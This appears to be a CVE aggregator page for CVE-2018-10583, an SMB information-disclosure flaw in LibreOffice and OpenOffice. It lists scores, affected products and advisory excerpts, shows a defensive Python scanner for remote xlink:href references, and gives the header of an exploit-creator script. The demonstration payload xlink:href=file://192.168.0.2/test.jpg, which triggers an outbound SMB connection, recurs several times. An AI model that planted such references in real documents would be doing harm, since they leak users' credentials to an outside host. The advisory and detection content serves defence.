
CVE-2018-10583

Published: 01/05/2018 Updated: 07/11/2023
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document.
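A defensive check for the pattern in the summary above, added here as an example (not code from the advisories or from either project): it lists the xlink:href values in an ODF package that name another host. The function names, the draw:image element in the constructed sample, and the choice to scan content.xml and styles.xml are assumptions.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"

def remote_hrefs(xml_bytes: bytes) -> list[str]:
    """Return xlink:href values that point at another host instead of the package."""
    # ElementTree does not fetch external entities; for bulk scanning of
    # untrusted files, defusedxml is the more conservative parser.
    hits = []
    for elem in ET.fromstring(xml_bytes).iter():
        href = elem.get(XLINK_HREF)
        if not href:
            continue
        parsed = urlparse(href)
        # file://HOST/path names a remote share; file:///path is a local file.
        if parsed.scheme == "file" and parsed.netloc not in ("", "localhost"):
            hits.append(href)
        elif href.startswith(("\\\\", "//")):  # raw UNC or scheme-relative form
            hits.append(href)
    return hits

def scan_odt(data: bytes) -> list[str]:
    """Scan the XML members of an ODF package supplied as raw bytes."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in ("content.xml", "styles.xml"):
            if name in pkg.namelist():
                found += remote_hrefs(pkg.read(name))
    return found

def build_sample(href: str) -> bytes:
    """Constructed test input: a minimal package whose content.xml carries href."""
    xml = (
        '<office:document-content'
        ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
        ' xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"'
        ' xmlns:xlink="http://www.w3.org/1999/xlink">'
        f'<office:body><draw:image xlink:href="{href}"/></office:body>'
        '</office:document-content>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("content.xml", xml)
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_odt(build_sample("file://192.168.0.2/test.jpg")))
```

A non-empty result is a reason to quarantine the file before it reaches a desktop office suite; relative references such as Pictures/test.jpg and local file:/// paths are not reported.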

Vulnerable Product

libreoffice libreoffice 6.0.3

apache openoffice 4.1.5

debian debian linux 8.0

debian debian linux 7.0

debian debian linux 9.0

redhat enterprise linux desktop 7.0

redhat enterprise linux workstation 7.0

redhat enterprise linux server 7.0

canonical ubuntu linux 16.04

canonical ubuntu linux 14.04

Vendor Advisories

Synopsis: Moderate: libreoffice security and bug fix update. Type/Severity: Security Advisory: Moderate. Topic: An update for libreoffice is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System ( ...
Several security issues were fixed in LibreOffice ...
An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document ...

Exploits

#! /usr/bin/python
# Exploit Title: Malicious ODF File Creator
# Date: 1st May 2018
# Exploit Author: Richard Davy
# Vendor Homepage: www.libreoffice.org/
# Software Link: www.libreoffice.org/
# Version: LibreOffice 6.0.3, OpenOffice 4.1.5
# Tested on: Windows 10
#
# Quick script/POC code to create a malicious ODF which can be used ...

RedTeam Pentesting discovered a vulnerability in the BigBlueButton web conferencing system version 2.2.25 that allows participants of a conference with permissions to upload presentations to read arbitrary files from the file system and perform server-side requests. This leads to administrative access to the BigBlueButton instance ...

Mailing Lists

Full Disclosure mailing list archives: [RT-SA-2020-005] Arbitrary File Disclosure and Server-Side Request Forgery in BigBlueButton ...

Github Repositories

An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by "xlink:href=file://192.168.0.2/test.jpg" within an "office:document-content" element in a ".odt XML document".

CVE-2018-10583: An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by "xlink:href=file://192.168.0.2/test.jpg" within an "office:document-content" element in a ".odt XML document" bitly/2w9